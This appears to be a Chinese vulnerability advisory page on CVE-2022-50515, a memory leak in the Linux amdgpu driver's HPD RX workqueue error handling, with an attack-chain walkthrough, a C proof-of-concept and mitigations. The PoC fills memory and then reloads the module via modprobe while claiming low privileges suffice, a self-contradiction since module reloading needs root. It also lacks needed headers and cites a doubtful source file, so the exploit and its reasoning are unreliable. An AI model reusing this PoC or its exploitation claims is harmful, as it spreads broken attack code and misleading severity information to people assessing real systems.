CVE-2022-50515 Linux内核amdgpu驱动hpd_rx

漏洞信息

漏洞编号

CVE-2022-50515

漏洞类型

内存泄漏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核drm/amdgpu驱动

漏洞概述

CVE-2022-50515是Linux内核AMD GPU驱动（drm/amdgpu）中存在的一个内存泄漏漏洞。该漏洞位于hpd_rx_irq_create_workqueue()函数中，在处理热插拔检测接收中断（HPD RX IRQ）的离线工作时被触发。

在AMD GPU驱动的初始化过程中，系统需要创建一组工作队列（workqueue）数组来处理HPD RX中断的离线工作负载。这些工作队列用于异步处理GPU热插拔事件，确保系统能够正确响应显示设备的连接和断开。然而，当创建工作队列数组的过程中发生失败时（例如由于内存分配失败等原因），驱动程序未能正确执行清理操作。具体而言，已经成功创建的工作队列未被销毁，为hpd_rx_irq_offload_work_queue结构体数组分配的内存也未被释放。

这种资源泄漏会导致内核内存逐渐耗尽，特别是在频繁触发GPU热插拔事件或反复初始化GPU驱动的场景下。攻击者可以通过本地低权限访问，利用该漏洞持续消耗系统内存资源，最终可能导致系统性能下降或触发内核的内存不足（OOM）机制，从而影响系统可用性。该漏洞的CVSS评分为5.5，属于中等严重等级，攻击者需要本地低权限访问即可利用，无需用户交互。

技术细节

该漏洞的技术原理涉及Linux内核AMD GPU驱动中的工作队列管理机制。

在amdgpu驱动初始化过程中，hpd_rx_irq_create_workqueue()函数负责为每个HPD（Hot Plug Detection）接收器创建一个工作队列。工作队列是Linux内核中用于异步执行任务的机制，允许驱动程序将耗时操作推迟到进程上下文执行。

漏洞的根本原因在于错误处理路径不完整。当使用alloc_workqueue()创建工作队列的循环过程中，如果某一次调用失败（例如由于系统内存压力），函数会返回一个错误码，但在此之前已经成功创建的工作队列没有被逐个销毁（通过destroy_workqueue()），同时为work_queue结构体数组分配的内存也没有被释放（通过kfree()）。

攻击利用方式：
1. 攻击者需要拥有系统的本地低权限访问权限；
2. 通过触发AMD GPU驱动的初始化或重新初始化流程（例如通过加载/卸载amdgpu模块）；
3. 在内存压力条件下，使alloc_workqueue()调用失败；
4. 观察内核内存使用量的持续增长；
5. 反复执行上述步骤以耗尽系统内存；
6. 最终触发内核OOM killer或导致系统不稳定。

该漏洞的影响主要体现在可用性方面（CVSS向量中A:H），由于每次泄漏的内存量相对较小，攻击者需要持续触发才能造成显著影响。

攻击链分析

STEP 1

步骤1：获取本地访问

攻击者需要拥有目标系统的本地低权限访问权限（PR:L），可以通过已获得的shell账户或利用其他漏洞获取本地访问。

STEP 2

步骤2：创建内存压力

攻击者通过分配大量内存资源，使系统处于内存压力状态，增加alloc_workqueue()调用失败的可能性。

STEP 3

步骤3：触发GPU驱动初始化

通过modprobe命令卸载并重新加载amdgpu内核模块，触发hpd_rx_irq_create_workqueue()函数的执行。

STEP 4

步骤4：触发内存泄漏

在内存压力条件下，工作队列创建循环中的某次alloc_workqueue()调用失败，导致已创建的工作队列和分配的内存未被释放。

STEP 5

步骤5：持续消耗内存

攻击者反复执行步骤2-4，持续累积内存泄漏，逐渐耗尽系统可用内存。

STEP 6

步骤6：影响系统可用性

当系统内存耗尽时，触发内核OOM killer杀死关键进程，或导致系统性能严重下降、响应迟缓。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// PoC for CVE-2022-50515 - Linux Kernel amdgpu memory leak
// This PoC demonstrates the memory leak by repeatedly triggering
// amdgpu module initialization under memory pressure conditions.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>

/*
 * The vulnerability exists in hpd_rx_irq_create_workqueue() in
 * drivers/gpu/drm/amd/amdgpu/amdgpu_irq.c
 *
 * When workqueue creation fails mid-loop, previously created
 * workqueues are not destroyed, causing memory leaks.
 *
 * To trigger this PoC:
 * 1. Run with low privileges (PR:L required)
 * 2. Create memory pressure to force alloc_workqueue() to fail
 * 3. Reload the amdgpu module to trigger hpd_rx_irq_create_workqueue()
 */

int main(int argc, char *argv[]) {
    int ret;
    pid_t pid;

    printf("CVE-2022-50515 PoC - amdgpu memory leak\n");

    /* Fork a process to consume memory and create pressure */
    pid = fork();
    if (pid == 0) {
        /* Child: consume memory to create pressure */
        size_t total = 0;
        while (1) {
            void *p = malloc(1024 * 1024); /* 1MB chunks */
            if (!p) break;
            memset(p, 0, 1024 * 1024);
            total += 1024 * 1024;
        }
        printf("Consumed %zu bytes of memory\n", total);
        pause();
        return 0;
    }

    /* Wait for memory pressure to build up */
    sleep(2);

    /* Try to reload amdgpu module to trigger the vulnerable code path */
    printf("Attempting to reload amdgpu module...\n");
    ret = system("modprobe -r amdgpu 2>/dev/null");
    if (ret != 0) {
        printf("Failed to remove amdgpu module (may not be loaded)\n");
    }

    ret = system("modprobe amdgpu 2>/dev/null");
    if (ret != 0) {
        printf("Failed to load amdgpu module\n");
        kill(pid, SIGKILL);
        return 1;
    }

    printf("Module reloaded. Check kernel memory for leaks.\n");
    printf("Repeat the process to accumulate memory leaks.\n");

    /* Clean up */
    kill(pid, SIGKILL);
    waitpid(pid, NULL, 0);

    return 0;
}

影响范围

Linux内核 < 5.15.72

Linux内核 5.16.x < 5.16.58

Linux内核 5.17.x < 5.17.14

Linux内核 5.18.x < 5.18.3

Linux内核drm/amdgpu驱动受影响版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）限制普通用户对amdgpu内核模块的访问权限，通过配置udev规则或文件权限防止非特权用户触发模块重载；2）监控系统内存使用情况，设置内存使用阈值告警；3）在关键系统中禁用amdgpu模块的自动加载功能；4）使用cgroups限制单个用户的内存使用上限，防止恶意消耗系统内存；5）定期检查内核日志，关注内存分配失败相关的错误信息。

CVE-2022-50515 Linux内核amdgpu驱动hpd_rx_irq内存泄漏漏洞